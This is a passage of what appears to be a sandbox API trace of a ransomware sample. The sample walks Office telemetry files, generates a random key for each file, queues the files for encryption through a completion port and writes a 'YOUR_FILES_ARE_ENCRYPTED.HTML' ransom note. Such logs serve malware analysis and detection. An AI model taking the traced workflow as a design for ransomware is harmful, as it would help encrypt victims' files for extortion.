nFileSizeLow=0x34d, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat", cAlternateFileName="{530FA~1.DAT")) returned 1 [0111.450] StrStrIW (lpFirst="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.450] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat") returned 148 [0111.450] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0111.450] lstrlenW (lpString=".dat") returned 4 [0111.450] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0111.450] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{530fa225-a741-4103-8238-7b3d9de36f28} (0) - 3596 - winword.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.450] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=845) returned 1 [0111.450] GetProcessHeap () returned 0x600000 [0111.450] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0111.452] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="76") returned 2 [0111.452] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="D8") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F8") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B3") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="28") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E0") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B6") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B8") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="BC") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E1") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C3") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="9A") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="30") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F5") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="FE") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="13") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="CB") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="5A") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="64") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A6") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="2D") returned 2 [0111.453] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="56") returned 2 [0111.453] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="0E") returned 2 [0111.453] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="21") returned 2 [0111.453] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="23") returned 2 [0111.453] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E5") returned 2 [0111.453] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="71") returned 2 [0111.453] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="5A") returned 2 [0111.453] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="56") returned 2 [0111.453] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="DF") returned 2 [0111.453] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="89") returned 2 [0111.453] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="75") returned 2 [0111.454] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (0) - 3596 - winword.exe - OTeleMediumCost.dat" [0111.454] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.454] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0111.454] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4b31aee, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4b31aee, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4b31aee, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTele.dat", cAlternateFileName="{530FA~4.DAT")) returned 1 [0111.454] StrStrIW (lpFirst="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.454] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTele.dat") returned 138 [0111.454] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTele.dat") returned=".dat" [0111.454] lstrlenW (lpString=".dat") returned 4 [0111.454] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTele.dat") returned=".dat" [0111.454] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{530fa225-a741-4103-8238-7b3d9de36f28} (1) - 3596 - winword.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.458] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=300) returned 1 [0111.458] CloseHandle (hObject=0x310) returned 1 [0111.459] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4b13100, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4b13100, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4b30677, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x195, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTeleMediumCost.dat", cAlternateFileName="{530FA~3.DAT")) returned 1 [0111.459] StrStrIW (lpFirst="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.459] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTeleMediumCost.dat") returned 148 [0111.459] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0111.459] lstrlenW (lpString=".dat") returned 4 [0111.459] PathFindExtensionW (pszPath="{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0111.459] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{530FA225-A741-4103-8238-7B3D9DE36F28} (1) - 3596 - winword.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{530fa225-a741-4103-8238-7b3d9de36f28} (1) - 3596 - winword.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.465] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=405) returned 1 [0111.465] CloseHandle (hObject=0x334) returned 1 [0111.465] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf025907, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaf025907, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaf025907, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x117, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTele.dat", cAlternateFileName="{C116F~2.DAT")) returned 1 [0111.465] StrStrIW (lpFirst="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.465] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTele.dat") returned 136 [0111.465] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTele.dat") returned=".dat" [0111.465] lstrlenW (lpString=".dat") returned 4 [0111.465] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTele.dat") returned=".dat" [0111.465] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{c116fc9a-b698-46de-a139-0bd729ca72f1} (0) - 3756 - excel.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.466] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=279) returned 1 [0111.466] CloseHandle (hObject=0x334) returned 1 [0111.466] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf025907, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaf025907, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaf025907, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x345, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{C116F~1.DAT")) returned 1 [0111.466] StrStrIW (lpFirst="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.466] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat") returned 146 [0111.466] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0111.466] lstrlenW (lpString=".dat") returned 4 [0111.466] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0111.466] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{c116fc9a-b698-46de-a139-0bd729ca72f1} (0) - 3756 - excel.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.466] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=837) returned 1 [0111.466] GetProcessHeap () returned 0x600000 [0111.466] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.468] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="6A") returned 2 [0111.468] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FF") returned 2 [0111.468] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F0") returned 2 [0111.468] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="73") returned 2 [0111.468] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="81") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="48") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="79") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="A8") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="9F") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="AD") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C5") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E0") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="42") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="1C") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="75") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="EB") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="91") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="ED") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="56") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="E3") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D6") returned 2 [0111.469] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="66") returned 2 [0111.469] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="83") returned 2 [0111.469] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="AF") returned 2 [0111.469] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="87") returned 2 [0111.469] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="CC") returned 2 [0111.469] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="AE") returned 2 [0111.469] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="C5") returned 2 [0111.469] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="19") returned 2 [0111.469] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="34") returned 2 [0111.469] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="97") returned 2 [0111.469] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0F") returned 2 [0111.470] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (0) - 3756 - excel.exe - OTeleMediumCost.dat" [0111.470] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.470] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.470] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf025907, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaf025907, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaf025907, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTele.dat", cAlternateFileName="{C116F~4.DAT")) returned 1 [0111.470] StrStrIW (lpFirst="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.470] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTele.dat") returned 136 [0111.470] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTele.dat") returned=".dat" [0111.470] lstrlenW (lpString=".dat") returned 4 [0111.470] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTele.dat") returned=".dat" [0111.470] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{c116fc9a-b698-46de-a139-0bd729ca72f1} (1) - 3756 - excel.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.470] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=300) returned 1 [0111.470] CloseHandle (hObject=0x318) returned 1 [0111.470] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf025907, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaf025907, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaf025907, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x195, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{C116F~3.DAT")) returned 1 [0111.470] StrStrIW (lpFirst="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.470] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat") returned 146 [0111.470] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0111.470] lstrlenW (lpString=".dat") returned 4 [0111.470] PathFindExtensionW (pszPath="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0111.470] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{c116fc9a-b698-46de-a139-0bd729ca72f1} (1) - 3756 - excel.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.471] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=405) returned 1 [0111.471] CloseHandle (hObject=0x318) returned 1 [0111.471] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf025907, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaf025907, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaf025907, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x195, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{C116FC9A-B698-46DE-A139-0BD729CA72F1} (1) - 3756 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{C116F~3.DAT")) returned 0 [0111.471] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.471] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0111.471] GetProcessHeap () returned 0x600000 [0111.471] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0111.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.473] WriteFile (in: hFile=0x31c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.474] CloseHandle (hObject=0x31c) returned 1 [0111.474] GetProcessHeap () returned 0x600000 [0111.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0111.475] GetProcessHeap () returned 0x600000 [0111.475] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.475] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x696efe32, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0xcbfe96be, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfebdca, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="OTele", cAlternateFileName="")) returned 0 [0111.475] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0111.475] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 